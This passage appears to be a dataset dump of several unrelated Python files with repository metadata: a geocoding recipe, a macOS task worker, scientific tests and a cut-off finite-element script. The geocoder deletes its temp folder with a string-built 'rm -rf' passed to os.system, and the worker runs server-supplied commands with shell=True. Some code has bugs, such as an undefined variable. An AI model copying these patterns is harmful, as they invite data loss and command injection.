            del self.cache[key]
| 30.747664 | 75 | 0.640426 | 2,491 | 0.757143 | 0 | 0 | 0 | 0 | 0 | 0 | 1,863 | 0.566261 |
352db0e47177ceb1a3626611938052d395f6e3f9 | 725 | py | Python | preprocessdata.py | zoepie/HTML-Project | dd6a177729312e75ed2dbc702e521eea5b2d63f3 | [
"MIT"
] | null | null | null | preprocessdata.py | zoepie/HTML-Project | dd6a177729312e75ed2dbc702e521eea5b2d63f3 | [
"MIT"
] | null | null | null | preprocessdata.py | zoepie/HTML-Project | dd6a177729312e75ed2dbc702e521eea5b2d63f3 | [
"MIT"
] | null | null | null | import numpy as np
from bs4 import BeautifulSoup
from tqdm import tqdm
import json
def read_file(filename):
    """Read the HTML file at *filename* and return a parsed BeautifulSoup tree."""
    with open(filename, 'r', encoding='utf-8') as html_file:
        markup = html_file.read()
    return BeautifulSoup(markup, "html.parser")
if __name__ == '__main__':
    # Mapping from a tag's space-joined class list to an integer index.
    with open('name2idx.json', 'r') as fp:
        name2idx = json.load(fp)
    with open('data/0.txt', 'r', encoding='utf-8')as f:
        contents = f.read()
    soup = BeautifulSoup(contents, "html.parser")
    # Replace each tag's class attribute with '###<index>'. Tags without a
    # class attribute, or whose class list is not in name2idx, raise
    # KeyError and are skipped unchanged.
    for tag in soup.find_all():
        try:
            if tag['class']:
                tag['class'] = '###' + str(name2idx[' '.join(tag['class'])])
        except KeyError:
            continue
    print(soup)
| 23.387097 | 76 | 0.572414 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 115 | 0.158621 |
353078a42c25216e1cef61978c7cbdf901484947 | 2,658 | py | Python | tests/test_surrogates.py | scott-trinkle/braingraphgeo | 990c4956acf8fe56f9bdb8871c265c4ea28da9a9 | [
"MIT"
] | null | null | null | tests/test_surrogates.py | scott-trinkle/braingraphgeo | 990c4956acf8fe56f9bdb8871c265c4ea28da9a9 | [
"MIT"
] | null | null | null | tests/test_surrogates.py | scott-trinkle/braingraphgeo | 990c4956acf8fe56f9bdb8871c265c4ea28da9a9 | [
"MIT"
] | null | null | null | import numpy as np
from numpy.testing import assert_array_equal, assert_array_almost_equal
from context import braingraphgeo as bgg
def test_geomsurr(sample_W_1, sample_D):
W = sample_W_1.values
d = sample_D.values
Wgeo = bgg.surrogates.geomsurr(W, d, rs=2021)
result = np.array([[0., 0.00072248, 0.00041477, 0.00033229, 0.00117053,
0.00055464, 0.00036433, 0.00056055],
[0.00072248, 0., 0.00057277, 0.0002278, 0.00030153,
0.00046146, 0.00016146, 0.00036927],
[0.00041477, 0.00057277, 0., 0.00048042, 0.00045515,
0.00033993, 0.00037418, 0.00065622],
[0.00033229, 0.0002278, 0.00048042, 0., 0.000422,
0.00063961, 0.00049343, 0.00052139],
[0.00117053, 0.00030153, 0.00045515, 0.000422, 0.,
0.00067446, 0.00056217, 0.00054075],
[0.00055464, 0.00046146, 0.00033993, 0.00063961, 0.00067446,
0., 0.00050643, 0.00012118],
[0.00036433, 0.00016146, 0.00037418, 0.00049343, 0.00056217,
0.00050643, 0., 0.00035025],
[0.00056055, 0.00036927, 0.00065622, 0.00052139, 0.00054075,
0.00012118, 0.00035025, 0.]])
assert_array_almost_equal(Wgeo, result)
def test_randomsurr(sample_W_1):
W = sample_W_1.values
Wrand = bgg.surrogates.randomsurr(W, rs=2021)
result = np.array([[0., 0.00051785, 0.00048846, 0.00030557, 0.0009939,
0.00062903, 0.00050726, 0.0006635],
[0.00051785, 0., 0.00062675, 0.00057998, 0.00049284,
0.00040059, 0.00016569, 0.00032815],
[0.00048846, 0.00062675, 0., 0.00049396, 0.00038688,
0.00012943, 0.00028872, 0.00041774],
[0.00030557, 0.00057998, 0.00049396, 0., 0.00045934,
0.00066296, 0.00040632, 0.00036962],
[0.0009939, 0.00049284, 0.00038688, 0.00045934, 0.,
0.00052429, 0.0005764, 0.00069369],
[0.00062903, 0.00040059, 0.00012943, 0.00066296, 0.00052429,
0., 0.00041742, 0.00037452],
[0.00050726, 0.00016569, 0.00028872, 0.00040632, 0.0005764,
0.00041742, 0., 0.00045061],
[0.0006635, 0.00032815, 0.00041774, 0.00036962, 0.00069369,
0.00037452, 0.00045061, 0.]])
assert_array_almost_equal(Wrand, result)
| 53.16 | 83 | 0.52784 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
35307980268b82f9e8f16546c421f49a138ad4df | 7,477 | py | Python | census-us/custom-recipes/address-batch-geocoder-us-census-geo/recipe.py | RedaAffane/dataiku-contrib | d409ddc25d31570972a14abb19a84ac101afc6cc | [
"Apache-2.0"
] | null | null | null | census-us/custom-recipes/address-batch-geocoder-us-census-geo/recipe.py | RedaAffane/dataiku-contrib | d409ddc25d31570972a14abb19a84ac101afc6cc | [
"Apache-2.0"
] | null | null | null | census-us/custom-recipes/address-batch-geocoder-us-census-geo/recipe.py | RedaAffane/dataiku-contrib | d409ddc25d31570972a14abb19a84ac101afc6cc | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
import dataiku
import pandas as pd, numpy as np
from dataiku import pandasutils as pdu
import requests
#import time
from dataiku.customrecipe import *
import sys
import re
import geocoder_utils
import common
import os
logging.info('1/6 Creating base folder...' )
path_datadir_tmp = dataiku.get_custom_variables()["dip.home"] + '/tmp/'
P_CENSUS_CONTENT = 'geocoder'
FOLDER_NAME = 'tmp_census_us_'+ P_CENSUS_CONTENT
common.create_folder(path_datadir_tmp,FOLDER_NAME,True)
input_name = get_input_names_for_role('input')[0]
output_ = get_output_names_for_role('output')[0]
output_dataset = dataiku.Dataset(output_)
P_COL_STREET = get_recipe_config()['p_col_street']
P_COL_CITY = get_recipe_config()['p_col_city']
P_COL_STATE = get_recipe_config()['p_col_state']
P_COL_ZIPCODE = get_recipe_config()['p_col_zipcode']
P_BENCHMARK = get_recipe_config()['p_benchmark']
P_VINTAGE = get_recipe_config()['p_vintage']
if P_BENCHMARK=="9":
P_VINTAGE ="910"
logging.info('2/6 Parameters:')
logging.info('[+] BENCHMARK = {} ; VINTAGE = {} '.format(P_BENCHMARK,P_VINTAGE))
P_BATCH_SIZE_UNIT = int(get_recipe_config()['param_batch_size'])
if P_BATCH_SIZE_UNIT is None:
P_BATCH_SIZE_UNIT = 5000
id_column = get_recipe_config()['p_col_id_column']
id_as_int = get_recipe_config()['param_id_as_int']
P_KEEP_NON_MATCHING = get_recipe_config()['param_keep_non_matching']
#P_RETRY_TIE = True #get_recipe_config()['param_retry_tie'] ### Potential optimization by resubmitting the ties.
in_cols = [id_column,P_COL_STREET,P_COL_CITY,P_COL_STATE,P_COL_ZIPCODE]
if id_as_int:
id_type='int'
else:
id_type='string'
logging.info('3/6 Input columns:')
logging.info(in_cols)
schema = [{'name':id_column,'type':id_type}
,{'name':'street','type':'string'}
,{'name':'city','type':'string'}
,{'name':'state','type':'string'}
,{'name':'zipcode','type':'string'}
,{'name':'match','type':'string'}
,{'name':'match_quality','type':'string'}
,{'name':'matched_address','type':'string'}
,{'name':'matched_state','type':'string'}
,{'name':'matched_city','type':'string'}
,{'name':'matched_zipcode','type':'string'}
,{'name':'matched_longitude','type':'string'}
,{'name':'matched_latitude','type':'string'}
,{'name':'matched_tigerLineId','type':'string'}
,{'name':'matched_side','type':'string'}
,{'name':'matched_state_id','type':'string'}
,{'name':'matched_county_id','type':'string'}
,{'name':'matched_tract_id','type':'string'}
,{'name':'matched_block_id','type':'string'}
,{'name':'tract_id','type':'string'}
,{'name':'block_group_id','type':'string'}
,{'name':'block_id','type':'string'}]
out_cols=[x['name'] for x in schema]
logging.info('4/6 Writing schema...')
output_dataset.write_schema(schema)
logging.info('5/6 Starting Batch...:')
batch_list_ok = []
b=-1
with output_dataset.get_writer() as writer:
for df in dataiku.Dataset(input_name).iter_dataframes(chunksize= P_BATCH_SIZE_UNIT , columns = in_cols):
b = b +1
logging.info('Processing batch: %s' % (b))
df = df[df[P_COL_STREET]<>'']
file_full_path = path_datadir_tmp + '/' + FOLDER_NAME + '/' + 'census_geocode_adresses_' + str(b) + '.csv'
df.to_csv(file_full_path,sep=',',index=None,header=None)
url = 'https://geocoding.geo.census.gov/geocoder/geographies/addressbatch?form'
payload = {'benchmark':P_BENCHMARK,'vintage':P_VINTAGE,'layers':14}
files = {'addressFile': (file_full_path, open(file_full_path, 'rb'), 'text/csv')}
try:
batch = requests.post(url, files=files, data = payload)
if batch.status_code == 200:
results = str(batch.text)
results = re.sub('"','',results)
results = results.split('\n')
for i,result in enumerate(results[:-1]):
res_parsed = results[i].split(',')
try:
idx = res_parsed.index('Match')
if idx==6:
res_parsed[1] = res_parsed[1] + res_parsed[2]
del res_parsed[2]
d=geocoder_utils.batch_geo_parse_regulars(res_parsed,out_cols)
elif idx==4:
ok4 = res_parsed[4]=='Match'
res_parsed.insert(3,'-')
d=geocoder_utils.batch_geo_parse_regulars(res_parsed,out_cols)
elif idx==5:
d=geocoder_utils.batch_geo_parse_regulars(res_parsed,out_cols)
else:
d={}
d[id_column]=res_parsed[0]
for k in out_cols[1:]:
d[k]=''
d['match']='Matched parsing required'
d['match_quality']=res_parsed
writer.write_row_dict(d)
except:
if P_KEEP_NON_MATCHING is True:
if len(res_parsed)==6:
d = pd.DataFrame([res_parsed],columns=out_cols[:6]).to_dict('record')[0]
elif len(res_parsed)==7:
res_parsed[1] = res_parsed[1] + res_parsed[2]
del res_parsed[2]
d = pd.DataFrame([res_parsed],columns=out_cols[:6]).to_dict('record')[0]
else:
d={}
d[id_column]=res_parsed[0]
for k in out_cols[1:]:
d[k]=''
d['match']='Custom parsing required'
d['match_quality']=res_parsed
writer.write_row_dict(d)
else:
logging.info("[Warning] : API returns this status: {}".format(s.status_code))
#except MaxRetryError as maxerror:
#print("Max Retries Error:", maxerror)
except requests.exceptions.HTTPError as Herr:
logging.info("Http Error:", Herr)
except requests.exceptions.ConnectionError as errc:
logging.info("Error Connecting:", errc)
except requests.exceptions.Timeout as errt:
logging.info("Timeout Error:", errt)
except requests.exceptions.RequestException as err:
logging.info("Something Else", err)
batch_list_ok.append(b)
## DEL ALL
logging.info('6/6 Dropping intermediate files...:' )
cmd = "rm -rf %s" % (path_datadir_tmp + '/' +FOLDER_NAME)
os.system(cmd)
| 35.77512 | 115 | 0.5216 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,840 | 0.246088 |
35309344c14773040e0f8d93e109f4776a3d6c80 | 15,008 | py | Python | workers/macos/worker.py | joweeba/mrtaskman | cef92f11cca3de45c77b76a68a91d85af9c8fb48 | [
"Apache-2.0"
] | null | null | null | workers/macos/worker.py | joweeba/mrtaskman | cef92f11cca3de45c77b76a68a91d85af9c8fb48 | [
"Apache-2.0"
] | null | null | null | workers/macos/worker.py | joweeba/mrtaskman | cef92f11cca3de45c77b76a68a91d85af9c8fb48 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""MrTaskman worker script which executes MacOS commands."""
__author__ = 'jeff.carollo@gmail.com (Jeff Carollo)'
import cStringIO
import datetime
import httplib
import json
import logging
import os
import socket
import StringIO
import subprocess
import sys
import time
import urllib2
import gflags
from client import mrtaskman_api
from client import package_installer
from client import package_cache
from common import device_info
from common import http_file_upload
from common import parsetime
from common import split_stream
FLAGS = gflags.FLAGS
gflags.DEFINE_string('log_filename', '', 'Where to log stuff. Required.')
gflags.DEFINE_string('worker_name', '', 'Unique worker name.')
gflags.DEFINE_list('worker_capabilities', ['macos', 'android'],
'Things this worker can do.')
# Package cache flags.
gflags.DEFINE_boolean('use_cache', True, 'Whether or not to use package cache.')
gflags.DEFINE_string('cache_path',
'/usr/local/worker_cache',
'Where to cache packages.')
gflags.DEFINE_integer('min_duration_seconds', 60,
'Minimum time to cache something.')
gflags.DEFINE_integer('max_cache_size_bytes', 2 * 1024 * 1024 * 1024,
'Maximum size of the cache in bytes.')
gflags.DEFINE_float('low_watermark_percentage', 0.6,
'When cleaning up, keeps at least this much cache.')
gflags.DEFINE_float('high_watermark_percentage', 0.8,
'When cleaning up, deletes to below this line.')
class TaskError(Exception):
pass
class MrTaskmanUnrecoverableHttpError(TaskError):
pass
class MrTaskmanRecoverableHttpError(TaskError):
pass
def GetHostname():
return socket.gethostname()
class MacOsWorker(object):
"""Executes macos tasks."""
def __init__(self, worker_name, log_stream):
self.worker_name_ = worker_name
self.log_stream_ = log_stream
self.api_ = mrtaskman_api.MrTaskmanApi()
self.hostname_ = GetHostname()
self.capabilities_ = {'executor': self.GetCapabilities()}
self.executors_ = {}
for capability in self.capabilities_['executor']:
self.executors_[capability] = self.ExecuteTask
self.use_cache_ = FLAGS.use_cache
if self.use_cache_:
self.package_cache_ = package_cache.PackageCache(
FLAGS.min_duration_seconds,
FLAGS.max_cache_size_bytes,
FLAGS.cache_path,
FLAGS.low_watermark_percentage,
FLAGS.high_watermark_percentage)
def GetCapabilities(self):
capabilities = device_info.GetCapabilities()
capabilities.append('macos')
capabilities.append(self.worker_name_)
return capabilities
def AssignTask(self):
"""Makes a request to /tasks/assign to get assigned a task.
Returns:
Task if a task was assigned, or None.
"""
try:
task = self.api_.AssignTask(self.worker_name_, self.hostname_,
self.capabilities_)
return task
except urllib2.HTTPError, e:
logging.info('Got %d HTTP response from MrTaskman on AssignTask.',
e.code)
return None
except urllib2.URLError, e:
logging.info('Got URLError trying to reach MrTaskman: %s', e)
return None
def SendResponse(self, task_id, stdout, stderr, task_result):
while True:
try:
# TODO(jeff.carollo): Refactor.
device_sn = device_info.GetDeviceSerialNumber()
task_result['device_serial_number'] = device_sn
response_url = self.api_.GetTaskCompleteUrl(task_id)
if not response_url:
logging.info('No task complete url for task_id %s', task_id)
return
response_url = response_url.get('task_complete_url', None)
if not response_url:
logging.info('No task complete url for task_id %s', task_id)
return
self.api_.SendTaskResult(response_url, stdout, stderr, task_result)
logging.info('Successfully sent response for task %s: %s',
task_id, self.api_.MakeTaskUrl(task_id))
return
except urllib2.HTTPError, error_response:
body = error_response.read()
code = error_response.code
if code == 404:
logging.warning('TaskCompleteUrl timed out.')
continue
logging.warning('SendResponse HTTPError code %d\n%s',
code, body)
return
except urllib2.URLError, e:
logging.info(
'Got URLError trying to send response to MrTaskman: %s', e)
logging.info('Retrying in 10 seconds')
time.sleep(10)
continue
def GetTaskCompleteUrl(self, task_id):
try:
return self.api_.GetTaskCompleteUrl(task_id)
except urllib2.HTTPError, error_response:
body = error_response.read()
code = error_response.code
logging.warning('GetTaskCompleteUrl HTTPError code %d\n%s',
code, body)
def ShouldWaitForDevice(self):
"""Returns True iff this worker controls a device which is offline."""
if not device_info.DEVICE_SN:
return False
return not device_info.DeviceIsConnected()
def PollAndExecute(self):
logging.info('Polling for work...')
device_active = True
while True:
try:
if self.ShouldWaitForDevice():
if device_active:
logging.info('Device %s is offline. Waiting for it to come back.',
device_info.DEVICE_SN)
device_active = False
time.sleep(10)
continue
if not device_active:
logging.info('Device came back online.')
device_active = True
# TODO(jeff.carollo): Wrap this in a catch-all Excepion handler that
# allows us to continue executing in the face of various task errors.
task = self.AssignTask()
if not task:
time.sleep(10)
continue
except KeyboardInterrupt:
logging.info('Caught CTRL+C. Exiting.')
return
task_stream = cStringIO.StringIO()
task_logs = None
self.log_stream_.AddStream(task_stream)
try:
logging.info('Got a task:\n%s\n', json.dumps(task, 'utf-8', indent=2))
config = task['config']
task_id = int(task['id'])
attempt = task['attempts']
# Figure out which of our executors we can use.
executor = None
allowed_executors = config['task']['requirements']['executor']
for allowed_executor in allowed_executors:
try:
executor = self.executors_[allowed_executor]
except KeyError:
pass
if executor is not None:
break
if executor is None:
# TODO: Send error response to server.
# This is probably our fault - we said we could do something
# that we actually couldn't do.
logging.error('No matching executor from %s', allowed_executors)
raise Exception('No allowed executors matched our executors_:\n' +
'%s\nvs.%s\n' % (allowed_executors, self.executors_))
try:
# We've got a valid executor, so use it.
(results, stdout, stderr) = executor(task_id, attempt, task, config)
except MrTaskmanUnrecoverableHttpError:
logging.error(
'Unrecoverable MrTaskman HTTP error. Aborting task %d.', task_id)
continue
finally:
self.log_stream_.RemoveStream(task_stream)
task_logs = task_stream.getvalue().decode('utf-8')
task_stream.close()
try:
results['worker_log'] = task_logs.encode('utf-8')
self.SendResponse(task_id,
stdout,
stderr,
results)
except MrTaskmanUnrecoverableHttpError:
logging.error(
'Unrecoverable MrTaskman HTTP error. Aborting task %d.', task_id)
logging.info('Polling for work...')
# Loop back up and poll for the next task.
def ExecuteTask(self, task_id, attempt, task, config):
logging.info('Recieved task %s', task_id)
try:
tmpdir = package_installer.TmpDir()
# Download the files we need from the server.
files = config.get('files', [])
self.DownloadAndStageFiles(files)
# Install any packages we might need.
# TODO(jeff.carollo): Handle any exceptions raised here.
packages = config.get('packages', [])
self.DownloadAndInstallPackages(packages, tmpdir)
# We probably don't want to run forever. Default to 12 minutes.
timeout = config['task'].get('timeout', '12m')
timeout = parsetime.ParseTimeDelta(timeout)
# Get any environment variables to inject.
env = config['task'].get('env', {})
env = env.update(os.environ)
# Get our command and execute it.
command = config['task']['command']
logging.info('Running command %s', command)
(exit_code, stdout, stderr, execution_time, result_metadata) = (
self.RunCommandRedirectingStdoutAndStderrWithTimeout(
command, env, timeout, tmpdir.GetTmpDir()))
logging.info('Executed %s with result %d', command, exit_code)
results = {
'kind': 'mrtaskman#task_complete_request',
'task_id': task_id,
'attempt': attempt,
'exit_code': exit_code,
'execution_time': execution_time.total_seconds(),
'result_metadata': result_metadata
}
return (results, stdout, stderr)
finally:
tmpdir.CleanUp()
def RunCommandRedirectingStdoutAndStderrWithTimeout(
self, command, env, timeout, cwd):
command = ' '.join([command, '>stdout', '2>stderr'])
# TODO: More precise timing through process info.
begin_time = datetime.datetime.now()
timeout_time = begin_time + timeout
process = subprocess.Popen(args=command,
env=env,
shell=True,
cwd=cwd)
ret = None
while None == ret and (datetime.datetime.now() < timeout_time):
time.sleep(0.02)
ret = process.poll()
finished_time = datetime.datetime.now()
if finished_time >= timeout_time and (None == ret):
logging.info('command %s timed out.', command)
process.terminate()
process.wait()
ret = -99
execution_time = finished_time - begin_time
try:
stdout = file(os.path.join(cwd, 'stdout'), 'rb')
except IOError, e:
logging.error('stdout was not written.')
stdout = file(os.path.join(cwd, 'stdout'), 'w')
stdout.write('No stdout.')
stdout.flush()
stdout.close()
stdout = file(os.path.join(cwd, 'stdout'), 'rb')
try:
stderr = file(os.path.join(cwd, 'stderr'), 'rb')
except IOError, e:
logging.error('stderr was not written.')
stderr = file(os.path.join(cwd, 'stderr'), 'w')
stderr.write('No stderr.')
stderr.flush()
stderr.close()
stderr = file(os.path.join(cwd, 'stderr'), 'rb')
try:
result_metadata_file = file(os.path.join(cwd, 'result_metadata'), 'r')
result_metadata = json.loads(result_metadata_file.read().decode('utf-8'))
except:
result_metadata = None
return (ret, stdout, stderr, execution_time, result_metadata)
def DownloadAndStageFiles(self, files):
logging.info('Not staging files: %s', files)
# TODO: Stage files.
def DownloadAndInstallPackages(self, packages, tmpdir):
# TODO(jeff.carollo): Create a package cache if things take off.
for package in packages:
attempts = 0
while True:
try:
# TODO(jeff.carollo): Put package cache code here.
if self.use_cache_:
self.package_cache_.CopyToDirectory(
package, tmpdir.GetTmpDir(),
package_installer.DownloadAndInstallPackage)
else:
package_installer.DownloadAndInstallPackage(
package['name'], package['version'],
tmpdir.GetTmpDir())
break
except urllib2.HTTPError, e:
logging.error('Got HTTPError %d trying to grab package %s.%s: %s',
e.code, package['name'], package['version'], e)
raise MrTaskmanUnrecoverableHttpError(e)
except (urllib2.URLError, httplib.IncompleteRead,
httplib.BadStatusLine, httplib.HTTPException), e:
logging.error('Got URLError trying to grab package %s.%s: %s',
package['name'], package['version'], e)
logging.info('Retrying in 10')
attempts += 1
# TODO(jeff.carollo): Figure out a robust way to do this.
# Likely need to just try a few times to get around Internet blips
# then mark task as failed for package reasons.
if attempts < 10:
time.sleep(10)
continue
else:
logging.error('Failed to grab package for 100 attempts. Aborting.')
raise MrTaskmanUnrecoverableHttpError(e)
except IOError, e:
logging.error('Got IOError trying to grab package %s.%s: %s',
package['name'], package['version'], e)
raise MrTaskmanUnrecoverableHttpError(e)
def main(argv):
try:
argv = FLAGS(argv)
except gflags.FlagsError, e:
sys.stderr.write('%s\n' % e)
sys.exit(1)
return
# Set default socket timeout to 2 hours so that we catch missing timeouts.
socket.setdefaulttimeout(2 * 60 * 60)
if not FLAGS.log_filename:
sys.stderr.write('Flag --log_filename is required.\n')
sys.exit(-9)
return
try:
from third_party import portalocker
log_file = file(FLAGS.log_filename, 'a+')
portalocker.lock(log_file, portalocker.LOCK_EX | portalocker.LOCK_NB)
except Exception, e:
logging.exception(e)
print 'Could not get exclusive lock.'
sys.exit(-10)
return
try:
FORMAT = '%(asctime)-15s %(message)s'
log_stream = split_stream.SplitStream(sys.stdout, log_file)
logging.basicConfig(format=FORMAT, level=logging.DEBUG,
stream=log_stream)
macos_worker = MacOsWorker(FLAGS.worker_name, log_stream=log_stream)
# Run forever, executing tasks from the server when available.
macos_worker.PollAndExecute()
finally:
logging.shutdown()
log_file.flush()
portalocker.unlock(log_file)
log_file.close()
if __name__ == '__main__':
main(sys.argv)
| 34.501149 | 80 | 0.640259 | 11,647 | 0.776053 | 0 | 0 | 0 | 0 | 0 | 0 | 4,383 | 0.292044 |
35325ac77e634192fcf4559a3df2220675e50312 | 1,421 | py | Python | pystrafe/tests/test_basic.py | Matherunner/pystrafe | 102533e7f011c1d6167990bb86653c18a5ae80b0 | [
"MIT"
] | 2 | 2020-08-03T15:21:42.000Z | 2022-02-13T15:35:28.000Z | pystrafe/tests/test_basic.py | Matherunner/pystrafe | 102533e7f011c1d6167990bb86653c18a5ae80b0 | [
"MIT"
] | null | null | null | pystrafe/tests/test_basic.py | Matherunner/pystrafe | 102533e7f011c1d6167990bb86653c18a5ae80b0 | [
"MIT"
] | null | null | null | from pytest import approx, warns, raises
from pystrafe import basic
def test_collide():
v = [-1000, 123, 456]
basic.collide(v, [1, 0, 0])
assert v == [0, 123, 456]
def test_collide_out_of_plane():
v = [100, 100, 100]
with warns(RuntimeWarning):
basic.collide(v, [1, 0, 0])
assert v == [100, 100, 100]
def test_collide_2d():
v = [-200, 200]
with raises(IndexError):
basic.collide(v, [1, 0, 0])
def test_collide_b_non_1():
v = [-100, 0, 0]
basic.collide(v, [1, 0, 0], 1.5)
assert v == [50, 0, 0]
def test_collide_b_lt_1():
v = [-100, 0, 0]
basic.collide(v, [1, 0, 0], 0.99999)
assert v == [0, 0, 0]
def test_friction():
v = [0, 100]
basic.friction(v, 0.01, basic.E, basic.k)
assert v == [0, 96]
v = [2000, 0]
basic.friction(v, 0.001, basic.E, basic.k)
assert v == [1992, 0]
def test_friction_zero_speed():
v = [0, 0]
basic.friction(v, 0.01, basic.E, basic.k)
assert v == [0, 0]
def test_frction_3d():
v = [40, 30, 1234567]
basic.friction(v, 0.01, basic.E, basic.k)
assert v == [36.8, 27.6, 1234567]
def test_frction_low_speed():
v = [1, 1]
basic.friction(v, 0.01, basic.E, basic.k)
assert v == [0, 0]
v = [0, 0.09]
basic.friction(v, 1e-10, basic.E, basic.k)
assert v == [0, 0.09]
basic.friction(v, 10000000, basic.E, basic.k)
assert v == [0, 0.09]
| 24.084746 | 49 | 0.560169 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
3533195f13e3ea818f2af16e979fbb241e157d75 | 6,108 | py | Python | MWE/SDHM/sdhm_dpp_exact_sc.py | volpatto/porousdrake | ffc2cadebc0415daa86fbeab130489d095b76193 | [
"MIT"
] | 1 | 2020-09-03T14:07:05.000Z | 2020-09-03T14:07:05.000Z | MWE/SDHM/sdhm_dpp_exact_sc.py | volpatto/porousdrake | ffc2cadebc0415daa86fbeab130489d095b76193 | [
"MIT"
] | null | null | null | MWE/SDHM/sdhm_dpp_exact_sc.py | volpatto/porousdrake | ffc2cadebc0415daa86fbeab130489d095b76193 | [
"MIT"
] | 1 | 2020-11-15T18:05:43.000Z | 2020-11-15T18:05:43.000Z | from firedrake import *
import numpy as np
from firedrake.petsc import PETSc
from firedrake import COMM_WORLD
try:
import matplotlib.pyplot as plt
plt.rcParams["contour.corner_mask"] = False
plt.close("all")
except:
warning("Matplotlib not imported")
nx, ny = 4, 4
Lx, Ly = 1.0, 1.0
quadrilateral = False
mesh = RectangleMesh(nx, ny, Lx, Ly, quadrilateral=quadrilateral)
plot(mesh)
plt.axis("off")
degree = 1
pressure_family = "DG"
velocity_family = "DG"
trace_family = "HDiv Trace"
U = VectorFunctionSpace(mesh, velocity_family, degree)
V = FunctionSpace(mesh, pressure_family, degree)
T = FunctionSpace(mesh, trace_family, degree)
W = U * V * T * U * V * T
# Trial and test functions
DPP_solution = Function(W)
u1, p1, lambda1, u2, p2, lambda2 = split(DPP_solution)
v1, q1, mu1, v2, q2, mu2 = TestFunctions(W)
# Mesh entities
n = FacetNormal(mesh)
x, y = SpatialCoordinate(mesh)
h = CellDiameter(mesh)
#################################################
# *** Model parameters
#################################################
mu0 = Constant(1.0)
k1 = Constant(1.0)
k2 = Constant(0.1)
b_factor = Constant(1.0)
def alpha1():
return mu0 / k1
def invalpha1():
return 1.0 / alpha1()
def alpha2():
return mu0 / k2
def invalpha2():
return 1.0 / alpha2()
#################################################
#################################################
#################################################
# Exact solution and source term projection
eta = sqrt(b_factor * (k1 + k2) / (k1 * k2))
p_exact_1 = mu0 / pi * exp(pi * x) * sin(pi * y) - mu0 / (b_factor * k1) * exp(eta * y)
p_exact_2 = mu0 / pi * exp(pi * x) * sin(pi * y) + mu0 / (b_factor * k2) * exp(eta * y)
p_e_1 = Function(W.sub(1)).interpolate(p_exact_1)
p_e_1_tr = Function(T).interpolate(p_exact_1)
p_e_1.rename("Exact macro pressure", "label")
p_e_2 = Function(W.sub(4)).interpolate(p_exact_2)
p_e_2_tr = Function(T).interpolate(p_exact_2)
p_e_2.rename("Exact micro pressure", "label")
v_e_1 = Function(W.sub(0), name="Exact macro velocity")
v_e_1.project(-(k1 / mu0) * grad(p_e_1))
v_e_2 = Function(W.sub(3), name="Exact macro velocity")
v_e_2.project(-(k2 / mu0) * grad(p_e_2))
plot(p_e_1)
plot(p_e_2)
# Source term
rhob1, rhob2 = Constant((0.0, 0.0)), Constant((0.0, 0.0))
f = Constant(0.0)
# Stabilizing parameter
beta_0 = Constant(1.0e-2)
beta = beta_0 / h
beta_avg = beta_0 / h("+")
delta_0 = Constant(1.0)
delta_1 = Constant(-0.5)
delta_2 = Constant(0.5)
delta_3 = Constant(0.0)
# Mixed classical terms
a = (dot(alpha1() * u1, v1) - div(v1) * p1 - delta_0 * q1 * div(u1)) * dx
a += (dot(alpha2() * u2, v2) - div(v2) * p2 - delta_0 * q2 * div(u2)) * dx
a += delta_0 * q1 * (b_factor * invalpha1() / k1) * (p2 - p1) * dx
a += delta_0 * q2 * (b_factor * invalpha2() / k2) * (p1 - p2) * dx
L = -delta_0 * dot(rhob1, v1) * dx
L += -delta_0 * dot(rhob2, v2) * dx
# Stabilizing terms
###
a += (
delta_1
* inner(invalpha1() * (alpha1() * u1 + grad(p1)), delta_0 * alpha1() * v1 + grad(q1))
* dx
)
a += (
delta_1
* inner(invalpha2() * (alpha2() * u2 + grad(p2)), delta_0 * alpha2() * v2 + grad(q2))
* dx
)
###
a += delta_2 * alpha1() * div(u1) * div(v1) * dx
a += delta_2 * alpha2() * div(u2) * div(v2) * dx
L += delta_2 * alpha1() * (b_factor * invalpha1() / k1) * (p2 - p1) * div(v1) * dx
L += delta_2 * alpha2() * (b_factor * invalpha2() / k2) * (p1 - p2) * div(v2) * dx
###
a += delta_3 * inner(invalpha1() * curl(alpha1() * u1), curl(alpha1() * v1)) * dx
a += delta_3 * inner(invalpha2() * curl(alpha2() * u2), curl(alpha2() * v2)) * dx
# Hybridization terms
###
a += lambda1("+") * jump(v1, n) * dS + mu1("+") * jump(u1, n) * dS
a += lambda2("+") * jump(v2, n) * dS + mu2("+") * jump(u2, n) * dS
###
a += beta_avg * invalpha1()("+") * (lambda1("+") - p1("+")) * (mu1("+") - q1("+")) * dS
a += beta_avg * invalpha2()("+") * (lambda2("+") - p2("+")) * (mu2("+") - q2("+")) * dS
# Weakly imposed BC from hybridization
a += beta * invalpha1() * (lambda1 - p_e_1) * mu1 * ds
a += beta * invalpha1() * (lambda2 - p_e_2) * mu2 * ds
a += (p_e_1 * dot(v1, n) + mu1 * (dot(u1, n) - dot(v_e_1, n))) * ds
a += (p_e_2 * dot(v2, n) + mu2 * (dot(u2, n) - dot(v_e_2, n))) * ds
F = a - L
# Solving SC below
PETSc.Sys.Print("*******************************************\nSolving using static condensation.\n")
solver_parameters = {
"snes_type": "ksponly",
"pmat_type": "matfree",
# 'ksp_view': True,
"ksp_type": "lgmres",
"ksp_monitor_true_residual": True,
# 'snes_monitor': True,
"ksp_rtol": 1.0e-5,
"ksp_atol": 1.0e-5,
"pc_type": "fieldsplit",
"pc_fieldsplit_0_fields": "0,1,2",
"pc_fieldsplit_1_fields": "3,4,5",
"fieldsplit_0": {
"pmat_type": "matfree",
"ksp_type": "preonly",
"pc_type": "python",
"pc_python_type": "firedrake.SCPC",
"pc_sc_eliminate_fields": "0, 1",
"condensed_field": {
"ksp_type": "preonly",
"pc_type": "lu",
"pc_factor_mat_solver_type": "mumps",
},
},
"fieldsplit_1": {
"pmat_type": "matfree",
"ksp_type": "preonly",
